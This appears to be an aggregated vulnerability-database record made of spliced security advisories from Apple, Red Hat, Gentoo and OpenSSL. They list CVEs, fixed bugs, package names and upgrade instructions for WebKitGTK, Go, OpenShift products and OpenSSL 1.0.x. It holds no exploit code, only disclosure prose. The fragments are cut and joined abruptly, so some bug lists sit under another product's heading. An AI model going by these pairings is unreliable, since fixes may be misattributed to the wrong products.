Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting "Settings ->
System -> Software Update -> Update Software." To check the current
version of software, select "Settings -> General -> About."
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmIvyxIACgkQeC9qKD1p
rhhDUg//VwUVUUj92pmEmjbj52uKnb1RZohn9dfkA9bESMzRy7wFwMUN973V2SPw
T6JpgCab0ZVNxBIfEXJq7wbi2Io08N0UMCE5GPNV0QL79x6ZmYwZREZwdHghrHGh
ggQtmYSZPipKLhvVOyXF7PamqHonnibbvfC/iWJSySnmPxQoHG7DoCzrX0wOnVBw
dkHEstKVo3eo2/OG/mGhYZw/g8EIAIDQbgP4XTD/m3hRnXbRMFff+7PgaE8cZzdY
45q8ExwqNOTdFoeqsKNmPBIzZJau9fWlekUlGpPXC1ASsiXmiptwvy07RbNLZ1N2
j2lFcLj7Ikzwiwsd7MBIFAMP0OWrT4Ds6YWdcgNX2iBkNoheqqt7AP4kOUnDP28Z
VXUriTbra9oPM0ctbZTBrmj7xiYjLbMJ4GRu2kIyGyTG9Wu9xEa3KH5Po1OR1Pxg
zG4gXdRIE241E26uee648uIFHhxRcgSdygXANnzkFv5/YslqQdccRD1F6FrJwqgn
V+ZFZ17zUhGW37F6Dmnd9LIo9GuiLl14qr1qfUoaQ+J+il2EV1UAv780wxQOuc4I
ZnvU4rEjaGmHwSh4/GDUTRFkI/fiA39WYpPkgXKN5yqHJG7AGENaROz3jnOxr/xU
JlVOleG7Z6MGdLwHG1i4QaBYrzadFZM20WsEOZ2twQzTVMQUyGk=qxuS
-----END PGP SIGNATURE-----
.
This release includes security and bug fixes, and enhancements. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.6.3 images
Red Hat Advanced Cluster Management for Kubernetes provides the
capabilities to address common challenges that administrators and site
reliability engineers face as they work across a range of public and
private cloud environments. Clusters and applications are all visible and
managed from a single console—with security policy built in. See the following
Release Notes documentation, which will be updated shortly for this
release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/
Bugs addressed:
* clusters belong to global clusterset is not selected by placement when
rescheduling (BZ# 2129679)
* RHACM 2.6.3 images (BZ# 2139085)
Security fixes:
* CVE-2022-3517 nodejs-minimatch: ReDoS via the braceExpand function
Security
* CVE-2022-41912 crewjam/saml: Authentication bypass when processing SAML
responses containing multiple Assertion elements
3. Bugs fixed (https://bugzilla.redhat.com/):
2129679 - clusters belong to global clusterset is not selected by placement when rescheduling
2134609 - CVE-2022-3517 nodejs-minimatch: ReDoS via the braceExpand function
2139085 - RHACM 2.6.3 images
2149181 - CVE-2022-41912 crewjam/saml: Authentication bypass when processing SAML responses containing multiple Assertion elements
5. Summary:
The Migration Toolkit for Containers (MTC) 1.7.6 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate
Kubernetes resources, persistent volume data, and internal container images
between OpenShift Container Platform clusters, using the MTC web console or
the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header
2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode
2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip
2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal
2132957 - Migration fails at UnQuiesceDestApplications step in OCP 4.12
2137304 - Location for host cluster is missing in the UI
2140208 - When editing a MigHook in the UI, the page may fail to reload
2143628 - Unable to create Storage Class Conversion plan due to missing cronjob error in OCP 4.12
2143872 - Namespaces page in web console stuck in loading phase
2149920 - Migration fails at prebackupHooks step
5. JIRA issues fixed (https://issues.jboss.org/):
MIG-1240 - Implement proposed changes for DVM support with PSAs in 4.12
6. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: webkit2gtk3 security and bug fix update
Advisory ID: RHSA-2022:7704-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2022:7704
Issue date: 2022-11-08
CVE Names: CVE-2022-22624 CVE-2022-22628 CVE-2022-22629
CVE-2022-22662 CVE-2022-26700 CVE-2022-26709
CVE-2022-26710 CVE-2022-26716 CVE-2022-26717
CVE-2022-26719 CVE-2022-30293
====================================================================
1. Summary:
An update for glib2 and webkit2gtk3 is now available for Red Hat Enterprise
Linux 8.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat CodeReady Linux Builder (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64
3. Description:
WebKitGTK is the port of the portable web rendering engine WebKit to the
GTK platform.
GLib provides the core application building blocks for libraries and
applications written in C. It provides the core object system used in
GNOME, the main loop implementation, and a large set of utility functions
for strings and common data structures.
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 8.7 Release Notes linked from the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source:
webkit2gtk3-2.36.7-1.el8.src.rpm
aarch64:
webkit2gtk3-2.36.7-1.el8.aarch64.rpm
webkit2gtk3-debuginfo-2.36.7-1.el8.aarch64.rpm
webkit2gtk3-debugsource-2.36.7-1.el8.aarch64.rpm
webkit2gtk3-devel-2.36.7-1.el8.aarch64.rpm
webkit2gtk3-devel-debuginfo-2.36.7-1.el8.aarch64.rpm
webkit2gtk3-jsc-2.36.7-1.el8.aarch64.rpm
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8.aarch64.rpm
webkit2gtk3-jsc-devel-2.36.7-1.el8.aarch64.rpm
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8.aarch64.rpm
ppc64le:
webkit2gtk3-2.36.7-1.el8.ppc64le.rpm
webkit2gtk3-debuginfo-2.36.7-1.el8.ppc64le.rpm
webkit2gtk3-debugsource-2.36.7-1.el8.ppc64le.rpm
webkit2gtk3-devel-2.36.7-1.el8.ppc64le.rpm
webkit2gtk3-devel-debuginfo-2.36.7-1.el8.ppc64le.rpm
webkit2gtk3-jsc-2.36.7-1.el8.ppc64le.rpm
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8.ppc64le.rpm
webkit2gtk3-jsc-devel-2.36.7-1.el8.ppc64le.rpm
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8.ppc64le.rpm
s390x:
webkit2gtk3-2.36.7-1.el8.s390x.rpm
webkit2gtk3-debuginfo-2.36.7-1.el8.s390x.rpm
webkit2gtk3-debugsource-2.36.7-1.el8.s390x.rpm
webkit2gtk3-devel-2.36.7-1.el8.s390x.rpm
webkit2gtk3-devel-debuginfo-2.36.7-1.el8.s390x.rpm
webkit2gtk3-jsc-2.36.7-1.el8.s390x.rpm
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8.s390x.rpm
webkit2gtk3-jsc-devel-2.36.7-1.el8.s390x.rpm
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8.s390x.rpm
x86_64:
webkit2gtk3-2.36.7-1.el8.i686.rpm
webkit2gtk3-2.36.7-1.el8.x86_64.rpm
webkit2gtk3-debuginfo-2.36.7-1.el8.i686.rpm
webkit2gtk3-debuginfo-2.36.7-1.el8.x86_64.rpm
webkit2gtk3-debugsource-2.36.7-1.el8.i686.rpm
webkit2gtk3-debugsource-2.36.7-1.el8.x86_64.rpm
webkit2gtk3-devel-2.36.7-1.el8.i686.rpm
webkit2gtk3-devel-2.36.7-1.el8.x86_64.rpm
webkit2gtk3-devel-debuginfo-2.36.7-1.el8.i686.rpm
webkit2gtk3-devel-debuginfo-2.36.7-1.el8.x86_64.rpm
webkit2gtk3-jsc-2.36.7-1.el8.i686.rpm
webkit2gtk3-jsc-2.36.7-1.el8.x86_64.rpm
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8.i686.rpm
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8.x86_64.rpm
webkit2gtk3-jsc-devel-2.36.7-1.el8.i686.rpm
webkit2gtk3-jsc-devel-2.36.7-1.el8.x86_64.rpm
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8.i686.rpm
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8.x86_64.rpm
Red Hat Enterprise Linux BaseOS (v. 8):
Source:
glib2-2.56.4-159.el8.src.rpm
aarch64:
glib2-2.56.4-159.el8.aarch64.rpm
glib2-debuginfo-2.56.4-159.el8.aarch64.rpm
glib2-debugsource-2.56.4-159.el8.aarch64.rpm
glib2-devel-2.56.4-159.el8.aarch64.rpm
glib2-devel-debuginfo-2.56.4-159.el8.aarch64.rpm
glib2-fam-2.56.4-159.el8.aarch64.rpm
glib2-fam-debuginfo-2.56.4-159.el8.aarch64.rpm
glib2-tests-2.56.4-159.el8.aarch64.rpm
glib2-tests-debuginfo-2.56.4-159.el8.aarch64.rpm
ppc64le:
glib2-2.56.4-159.el8.ppc64le.rpm
glib2-debuginfo-2.56.4-159.el8.ppc64le.rpm
glib2-debugsource-2.56.4-159.el8.ppc64le.rpm
glib2-devel-2.56.4-159.el8.ppc64le.rpm
glib2-devel-debuginfo-2.56.4-159.el8.ppc64le.rpm
glib2-fam-2.56.4-159.el8.ppc64le.rpm
glib2-fam-debuginfo-2.56.4-159.el8.ppc64le.rpm
glib2-tests-2.56.4-159.el8.ppc64le.rpm
glib2-tests-debuginfo-2.56.4-159.el8.ppc64le.rpm
s390x:
glib2-2.56.4-159.el8.s390x.rpm
glib2-debuginfo-2.56.4-159.el8.s390x.rpm
glib2-debugsource-2.56.4-159.el8.s390x.rpm
glib2-devel-2.56.4-159.el8.s390x.rpm
glib2-devel-debuginfo-2.56.4-159.el8.s390x.rpm
glib2-fam-2.56.4-159.el8.s390x.rpm
glib2-fam-debuginfo-2.56.4-159.el8.s390x.rpm
glib2-tests-2.56.4-159.el8.s390x.rpm
glib2-tests-debuginfo-2.56.4-159.el8.s390x.rpm
x86_64:
glib2-2.56.4-159.el8.i686.rpm
glib2-2.56.4-159.el8.x86_64.rpm
glib2-debuginfo-2.56.4-159.el8.i686.rpm
glib2-debuginfo-2.56.4-159.el8.x86_64.rpm
glib2-debugsource-2.56.4-159.el8.i686.rpm
glib2-debugsource-2.56.4-159.el8.x86_64.rpm
glib2-devel-2.56.4-159.el8.i686.rpm
glib2-devel-2.56.4-159.el8.x86_64.rpm
glib2-devel-debuginfo-2.56.4-159.el8.i686.rpm
glib2-devel-debuginfo-2.56.4-159.el8.x86_64.rpm
glib2-fam-2.56.4-159.el8.x86_64.rpm
glib2-fam-debuginfo-2.56.4-159.el8.i686.rpm
glib2-fam-debuginfo-2.56.4-159.el8.x86_64.rpm
glib2-tests-2.56.4-159.el8.x86_64.rpm
glib2-tests-debuginfo-2.56.4-159.el8.i686.rpm
glib2-tests-debuginfo-2.56.4-159.el8.x86_64.rpm
Red Hat CodeReady Linux Builder (v. 8):
aarch64:
glib2-debuginfo-2.56.4-159.el8.aarch64.rpm
glib2-debugsource-2.56.4-159.el8.aarch64.rpm
glib2-devel-debuginfo-2.56.4-159.el8.aarch64.rpm
glib2-fam-debuginfo-2.56.4-159.el8.aarch64.rpm
glib2-static-2.56.4-159.el8.aarch64.rpm
glib2-tests-debuginfo-2.56.4-159.el8.aarch64.rpm
noarch:
glib2-doc-2.56.4-159.el8.noarch.rpm
ppc64le:
glib2-debuginfo-2.56.4-159.el8.ppc64le.rpm
glib2-debugsource-2.56.4-159.el8.ppc64le.rpm
glib2-devel-debuginfo-2.56.4-159.el8.ppc64le.rpm
glib2-fam-debuginfo-2.56.4-159.el8.ppc64le.rpm
glib2-static-2.56.4-159.el8.ppc64le.rpm
glib2-tests-debuginfo-2.56.4-159.el8.ppc64le.rpm
s390x:
glib2-debuginfo-2.56.4-159.el8.s390x.rpm
glib2-debugsource-2.56.4-159.el8.s390x.rpm
glib2-devel-debuginfo-2.56.4-159.el8.s390x.rpm
glib2-fam-debuginfo-2.56.4-159.el8.s390x.rpm
glib2-static-2.56.4-159.el8.s390x.rpm
glib2-tests-debuginfo-2.56.4-159.el8.s390x.rpm
x86_64:
glib2-debuginfo-2.56.4-159.el8.i686.rpm
glib2-debuginfo-2.56.4-159.el8.x86_64.rpm
glib2-debugsource-2.56.4-159.el8.i686.rpm
glib2-debugsource-2.56.4-159.el8.x86_64.rpm
glib2-devel-debuginfo-2.56.4-159.el8.i686.rpm
glib2-devel-debuginfo-2.56.4-159.el8.x86_64.rpm
glib2-fam-debuginfo-2.56.4-159.el8.i686.rpm
glib2-fam-debuginfo-2.56.4-159.el8.x86_64.rpm
glib2-static-2.56.4-159.el8.i686.rpm
glib2-static-2.56.4-159.el8.x86_64.rpm
glib2-tests-debuginfo-2.56.4-159.el8.i686.rpm
glib2-tests-debuginfo-2.56.4-159.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2022-22624
https://access.redhat.com/security/cve/CVE-2022-22628
https://access.redhat.com/security/cve/CVE-2022-22629
https://access.redhat.com/security/cve/CVE-2022-22662
https://access.redhat.com/security/cve/CVE-2022-26700
https://access.redhat.com/security/cve/CVE-2022-26709
https://access.redhat.com/security/cve/CVE-2022-26710
https://access.redhat.com/security/cve/CVE-2022-26716
https://access.redhat.com/security/cve/CVE-2022-26717
https://access.redhat.com/security/cve/CVE-2022-26719
https://access.redhat.com/security/cve/CVE-2022-30293
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.7_release_notes/index
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. Description:
OpenShift Virtualization is Red Hat's virtualization solution designed for
Red Hat OpenShift Container Platform.
Security Fix(es):
* golang: out-of-bounds read in golang.org/x/text/language leads to DoS
(CVE-2021-38561)
* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)
* golang: regexp: stack exhaustion via a deeply nested expression
(CVE-2022-24921)
* golang: crypto/elliptic: panic caused by oversized scalar
(CVE-2022-28327)
* golang: crypto/tls: session tickets lack random ticket_age_add
(CVE-2022-30629)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Bug Fix(es):
* Cloning a Block DV to VM with Filesystem with not big enough size comes
to endless loop - using pvc api (BZ#2033191)
* Restart of VM Pod causes SSH keys to be regenerated within VM
(BZ#2087177)
* Import gzipped raw file causes image to be downloaded and uncompressed to
TMPDIR (BZ#2089391)
* [4.11] VM Snapshot Restore hangs indefinitely when backed by a
snapshotclass (BZ#2098225)
* Fedora version in DataImportCrons is not 'latest' (BZ#2102694)
* [4.11] Cloned VM's snapshot restore fails if the source VM disk is
deleted (BZ#2109407)
* CNV introduces a compliance check fail in "ocp4-moderate" profile -
routes-protected-by-tls (BZ#2110562)
* Nightly build: v4.11.0-578: index format was changed in 4.11 to
file-based instead of sqlite-based (BZ#2112643)
* Unable to start windows VMs on PSI setups (BZ#2115371)
* [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity
restricted:v1.24 (BZ#2128997)
* Mark Windows 11 as TechPreview (BZ#2129013)
* 4.11.1 rpms (BZ#2139453)
This advisory contains the following OpenShift Virtualization 4.11.1
images.
RHEL-8-CNV-4.11
virt-cdi-operator-container-v4.11.1-5
virt-cdi-uploadserver-container-v4.11.1-5
virt-cdi-apiserver-container-v4.11.1-5
virt-cdi-importer-container-v4.11.1-5
virt-cdi-controller-container-v4.11.1-5
virt-cdi-cloner-container-v4.11.1-5
virt-cdi-uploadproxy-container-v4.11.1-5
checkup-framework-container-v4.11.1-3
kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.1-7
kubevirt-tekton-tasks-create-datavolume-container-v4.11.1-7
kubevirt-template-validator-container-v4.11.1-4
virt-handler-container-v4.11.1-5
hostpath-provisioner-operator-container-v4.11.1-4
virt-api-container-v4.11.1-5
vm-network-latency-checkup-container-v4.11.1-3
cluster-network-addons-operator-container-v4.11.1-5
virtio-win-container-v4.11.1-4
virt-launcher-container-v4.11.1-5
ovs-cni-marker-container-v4.11.1-5
hyperconverged-cluster-webhook-container-v4.11.1-7
virt-controller-container-v4.11.1-5
virt-artifacts-server-container-v4.11.1-5
kubevirt-tekton-tasks-modify-vm-template-container-v4.11.1-7
kubevirt-tekton-tasks-disk-virt-customize-container-v4.11.1-7
libguestfs-tools-container-v4.11.1-5
hostpath-provisioner-container-v4.11.1-4
kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.1-7
kubevirt-tekton-tasks-copy-template-container-v4.11.1-7
cnv-containernetworking-plugins-container-v4.11.1-5
bridge-marker-container-v4.11.1-5
virt-operator-container-v4.11.1-5
hostpath-csi-driver-container-v4.11.1-4
kubevirt-tekton-tasks-create-vm-from-template-container-v4.11.1-7
kubemacpool-container-v4.11.1-5
hyperconverged-cluster-operator-container-v4.11.1-7
kubevirt-ssp-operator-container-v4.11.1-4
ovs-cni-plugin-container-v4.11.1-5
kubevirt-tekton-tasks-cleanup-vm-container-v4.11.1-7
kubevirt-tekton-tasks-operator-container-v4.11.1-2
cnv-must-gather-container-v4.11.1-8
kubevirt-console-plugin-container-v4.11.1-9
hco-bundle-registry-container-v4.11.1-49
3. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
2033191 - Cloning a Block DV to VM with Filesystem with not big enough size comes to endless loop - using pvc api
2064857 - CVE-2022-24921 golang: regexp: stack exhaustion via a deeply nested expression
2070772 - When specifying pciAddress for several SR-IOV NIC they are not correctly propagated to libvirt XML
2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode
2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar
2087177 - Restart of VM Pod causes SSH keys to be regenerated within VM
2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR
2091856 - ?Edit BootSource? action should have more explicit information when disabled
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add
2098225 - [4.11] VM Snapshot Restore hangs indefinitely when backed by a snapshotclass
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS
2102694 - Fedora version in DataImportCrons is not 'latest'
2109407 - [4.11] Cloned VM's snapshot restore fails if the source VM disk is deleted
2110562 - CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls
2112643 - Nightly build: v4.11.0-578: index format was changed in 4.11 to file-based instead of sqlite-based
2115371 - Unable to start windows VMs on PSI setups
2119613 - GiB changes to B in Template's Edit boot source reference modal
2128554 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass
2128872 - [4.11]Can't restore cloned VM
2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24
2129013 - Mark Windows 11 as TechPreview
2129235 - [RFE] Add "Copy SSH command" to VM action list
2134668 - Cannot edit ssh even vm is stopped
2139453 - 4.11.1 rpms
5. Solution:
For OpenShift Container Platform 4.11 see the following documentation,
which will be updated shortly for this release, for important instructions
on how to upgrade your cluster and fully apply this errata update:
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html
For Red Hat OpenShift Logging 5.5, see the following instructions to apply
this update:
https://docs.openshift.com/container-platform/4.11/logging/cluster-logging-upgrading.html
4. Bugs fixed (https://bugzilla.redhat.com/):
2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects
2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service
2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY
2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers
2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps
2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS
2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays
2140597 - CVE-2022-37603 loader-utils:Regular expression denial of service
5. JIRA issues fixed (https://issues.jboss.org/):
LOG-2860 - Error on LokiStack Components when forwarding logs to Loki on proxy cluster
LOG-3131 - vector: kube API server certificate validation failure due to hostname mismatch
LOG-3222 - [release-5.5] fluentd plugin for kafka ca-bundle secret doesn't support multiple CAs
LOG-3226 - FluentdQueueLengthIncreasing rule failing to be evaluated.
LOG-3284 - [release-5.5][Vector] logs parsed into structured when json is set without structured types.
LOG-3287 - [release-5.5] Increase value of cluster-logging PriorityClass to move closer to system-cluster-critical value
LOG-3301 - [release-5.5][ClusterLogging] elasticsearchStatus in ClusterLogging instance CR is not updated when Elasticsearch status is changed
LOG-3305 - [release-5.5] Kibana Authentication Exception cookie issue
LOG-3310 - [release-5.5] Can't choose correct CA ConfigMap Key when creating lokistack in Console
LOG-3332 - [release-5.5] Reconcile error on controller when creating LokiStack with tls config
6. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 202208-39
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: WebKitGTK+: Multiple Vulnerabilities
Date: August 31, 2022
Bugs: #866494, #864427, #856445, #861740, #837305, #845252, #839984, #833568, #832990
ID: 202208-39
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
=======
Multiple vulnerabilities have been found in WebkitGTK+, the worst of
which could result in the arbitrary execution of code.
Affected packages
================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.36.7 >= 2.36.7
Description
==========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Impact
=====
Please review the referenced CVE identifiers for details.
Workaround
=========
There is no known workaround at this time.
Resolution
=========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.36.7"
References
=========
[ 1 ] CVE-2022-2294
https://nvd.nist.gov/vuln/detail/CVE-2022-2294
[ 2 ] CVE-2022-22589
https://nvd.nist.gov/vuln/detail/CVE-2022-22589
[ 3 ] CVE-2022-22590
https://nvd.nist.gov/vuln/detail/CVE-2022-22590
[ 4 ] CVE-2022-22592
https://nvd.nist.gov/vuln/detail/CVE-2022-22592
[ 5 ] CVE-2022-22620
https://nvd.nist.gov/vuln/detail/CVE-2022-22620
[ 6 ] CVE-2022-22624
https://nvd.nist.gov/vuln/detail/CVE-2022-22624
[ 7 ] CVE-2022-22628
https://nvd.nist.gov/vuln/detail/CVE-2022-22628
[ 8 ] CVE-2022-22629
https://nvd.nist.gov/vuln/detail/CVE-2022-22629
[ 9 ] CVE-2022-22662
https://nvd.nist.gov/vuln/detail/CVE-2022-22662
[ 10 ] CVE-2022-22677
https://nvd.nist.gov/vuln/detail/CVE-2022-22677
[ 11 ] CVE-2022-26700
https://nvd.nist.gov/vuln/detail/CVE-2022-26700
[ 12 ] CVE-2022-26709
https://nvd.nist.gov/vuln/detail/CVE-2022-26709
[ 13 ] CVE-2022-26710
https://nvd.nist.gov/vuln/detail/CVE-2022-26710
[ 14 ] CVE-2022-26716
https://nvd.nist.gov/vuln/detail/CVE-2022-26716
[ 15 ] CVE-2022-26717
https://nvd.nist.gov/vuln/detail/CVE-2022-26717
[ 16 ] CVE-2022-26719
https://nvd.nist.gov/vuln/detail/CVE-2022-26719
[ 17 ] CVE-2022-30293
https://nvd.nist.gov/vuln/detail/CVE-2022-30293
[ 18 ] CVE-2022-30294
https://nvd.nist.gov/vuln/detail/CVE-2022-30294
[ 19 ] CVE-2022-32784
https://nvd.nist.gov/vuln/detail/CVE-2022-32784
[ 20 ] CVE-2022-32792
https://nvd.nist.gov/vuln/detail/CVE-2022-32792
[ 21 ] CVE-2022-32893
https://nvd.nist.gov/vuln/detail/CVE-2022-32893
[ 22 ] WSA-2022-0002
https://webkitgtk.org/security/WSA-2022-0002.html
[ 23 ] WSA-2022-0003
https://webkitgtk.org/security/WSA-2022-0003.html
[ 24 ] WSA-2022-0007
https://webkitgtk.org/security/WSA-2022-0007.html
[ 25 ] WSA-2022-0008
https://webkitgtk.org/security/WSA-2022-0008.html
Availability
===========
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/202208-39
Concerns?
========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us.
License
======
Copyright 2022 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
|
|
var-201609-0592
|
The certificate parser in OpenSSL before 1.0.1u and 1.0.2 before 1.0.2i might allow remote attackers to cause a denial of service (out-of-bounds read) via crafted certificate operations, related to s3_clnt.c and s3_srvr.c. OpenSSL is prone to a local denial-of-service vulnerability.
A local attacker can exploit this issue to cause a denial-of-service condition.
OpenSSL Security Advisory [22 Sep 2016]
========================================
OCSP Status Request extension unbounded memory growth (CVE-2016-6304)
=====================================================================
Severity: High
A malicious client can send an excessively large OCSP Status Request extension.
If that client continually requests renegotiation, sending a large OCSP Status
Request extension each time, then there will be unbounded memory growth on the
server. This will eventually lead to a Denial Of Service attack through memory
exhaustion. Servers with a default configuration are vulnerable even if they do
not support OCSP. Builds using the "no-ocsp" build time option are not affected.
Servers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default
configuration, instead only if an application explicitly enables OCSP stapling
support.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL
development team.
SSL_peek() hang on empty record (CVE-2016-6305)
===============================================
Severity: Moderate
OpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an
empty record. This could be exploited by a malicious peer in a Denial Of Service
attack.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The
fix was developed by Matt Caswell of the OpenSSL development team.
SWEET32 Mitigation (CVE-2016-2183)
==================================
Severity: Low
SWEET32 (https://sweet32.info) is an attack on older block cipher algorithms
that use a block size of 64 bits. In mitigation for the SWEET32 attack DES based
ciphersuites have been moved from the HIGH cipherstring group to MEDIUM in
OpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these
ciphersuites disabled by default.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 16th August 2016 by Karthikeyan
Bhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the
OpenSSL development team.
OOB write in MDC2_Update() (CVE-2016-6303)
==========================================
Severity: Low
An overflow can occur in MDC2_Update() either if called directly or
through the EVP_DigestUpdate() function using MDC2. If an attacker
is able to supply very large amounts of input data after a previous
call to EVP_EncryptUpdate() with a partial block then a length check
can overflow resulting in a heap corruption.
The amount of data needed is comparable to SIZE_MAX which is impractical
on most platforms.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
Malformed SHA512 ticket DoS (CVE-2016-6302)
===========================================
Severity: Low
If a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a
DoS attack where a malformed ticket will result in an OOB read which will
ultimately crash.
The use of SHA512 in TLS session tickets is comparatively rare as it requires
a custom server callback and ticket lookup mechanism.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
OOB write in BN_bn2dec() (CVE-2016-2182)
========================================
Severity: Low
The function BN_bn2dec() does not check the return value of BN_div_word().
This can cause an OOB write if an application uses this function with an
overly large BIGNUM. This could be a problem if an overly large certificate
or CRL is printed out from an untrusted source. TLS is not affected because
record limits will reject an oversized certificate before it is parsed.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
